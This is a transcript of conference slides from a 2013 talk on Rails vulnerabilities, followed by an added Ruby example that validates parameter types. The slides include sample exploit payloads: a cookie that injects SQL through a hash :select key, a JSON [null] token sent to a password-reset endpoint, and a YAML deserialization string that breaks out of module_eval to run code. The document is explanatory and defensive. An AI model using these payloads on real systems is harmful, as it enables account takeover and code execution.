Rails Security Primer

A short overview of Rails' software security troubles in January and February of 2013, and a few tips on how to defend yourself against attackers. Presented at Vienna.rb on 2013-03-07

Markus Wein

March 07, 2013

Transcript

  1. Exploit: a piece of software that exploits a vulnerability to achieve unintended or unanticipated behavior.

  2. A cookie like

       { "session_id" => "41414141",
         "user_credentials" => "Phenoelit",
         "user_credentials_id" => {
           :select => " *,\"Phenoelit\" as persistence_token from users -- " } }

  3-4. …would create a query like this:

       User.find_by_id(params[:user_credentials_id])
       User.find_by_id({:select => "*,\"Phenoelit\" as persistence_token from users --"})

       SELECT *,"Phenoelit" as persistence_token from users -- FROM "users" WHERE "users"."id" IS NULL LIMIT 1

  5.   def reset_password
         if (@user = User.find_by_token(params[:token]))
           @user.reset_password!
           render :json => 'Success'
         else
           render :json => 'Failure'
         end
       end
       # POST to http://localhost:3000/users/reset_password with "{\"token\":[null]}"

  6.   class Helpers
         def initialize
           @module = Module.new
         end

         def []=(key, value)
           @module.module_eval <<-END_EVAL
             def #{value}(*args)
               # ... other stuff
             end
           END_EVAL
         end
       end

  7-9. <fail type="yaml">
       --- !ruby/hash:Helpers
       foo: |-
         mname; end; puts 'hello!';
         def oops
       </fail>

       • Ah, this is a subclass of a Ruby hash with the class of Helpers
       • Create a new instance of Helpers
       • Use the []= method for each key-value pair

  10.  class Helpers
         def initialize
           @module = Module.new
         end

         def []=(key, value)
           @module.module_eval <<-END_EVAL
             def #{value}(*args)
               # ... other stuff
             end
           END_EVAL
         end
       end

       ['foo', "mname; end; puts 'hello!'; def oops"]

  11.  User.where(:login_token => params[:token]).first

       SELECT * FROM `users` WHERE `login_token` = 0 LIMIT 1;

       "Potential Query Manipulation with Common Rails Practices"

  12. Treat each vulnerability as if your servers were physically on fire (i.e., as a big, "drop everything right now" deal).
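Added example, not from the talk: the common thread in slides 3-5 and 11 is a request parameter of the wrong shape (a Hash where an id was expected, a JSON [null] that arrives as [nil]) reaching a finder. This plain-Ruby check rejects such values before any query is built; require_string_param, find_user_by_token and the USERS rows are my own constructions.

```ruby
# Added example, not from the slides. Rails later hardened the finders
# themselves; the point here is the application-side check: a lookup
# parameter must be a plain, non-empty String before it touches a query.

class BadParameter < ArgumentError; end

# Hypothetical helper: returns params[key] only when it is a non-empty String.
# nil, Array ([nil] from JSON "[null]"), Hash ({"select" => ...}) and numbers
# raise instead of reaching the finder.
def require_string_param(params, key)
  value = params[key]
  unless value.is_a?(String) && !value.empty?
    raise BadParameter, "#{key}: expected non-empty String, got #{value.inspect}"
  end
  value
end

# Constructed stand-in for the users table; the row with a nil token is the
# one a "WHERE login_token IS NULL" query would have matched.
USERS = [
  { id: 1, login: "alice", login_token: "t0k3n-alice" },
  { id: 2, login: "admin", login_token: nil },
].freeze

# Hypothetical finder: the token is validated first, so only an exact
# string comparison ever happens (no Hash, Array or nil ever reaches it).
def find_user_by_token(params, users = USERS)
  token = require_string_param(params, "token")
  users.find { |u| u[:login_token] == token }
end

# Summarises what the lookup did: "found <login>", "no match" or "rejected: ...".
def lookup_outcome(params)
  user = find_user_by_token(params)
  user ? "found #{user[:login]}" : "no match"
rescue BadParameter => e
  "rejected: #{e.message}"
end

if $PROGRAM_NAME == __FILE__
  puts lookup_outcome({ "token" => "t0k3n-alice" })
  puts lookup_outcome({ "token" => [nil] })
  puts lookup_outcome({ "token" => { "select" => "*" } })
end
```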
  13. Sources I used for this talk:
       http://www.kalzumeus.com/2013/01/31/what-the-rails-security-issue-means-for-your-startup/
       http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html
       http://ronin-ruby.github.com/blog/2013/01/28/new-rails-poc.html
       http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution-vulnerability-explained/
       http://tenderlovemaking.com/2013/02/06/yaml-f7u12.html
       http://blog.gemfury.com/post/42259456238/rubygems-vulnerability-explained

  14. Further reading:
       http://guides.rubyonrails.org/security.html (Ruby on Rails Security Guide)
       http://rails-sqli.org (Rails SQL Injection Overview)
       http://brakemanscanner.org (Brakeman: vulnerability scanner for Rails)
       https://groups.google.com/forum/rubyonrails-security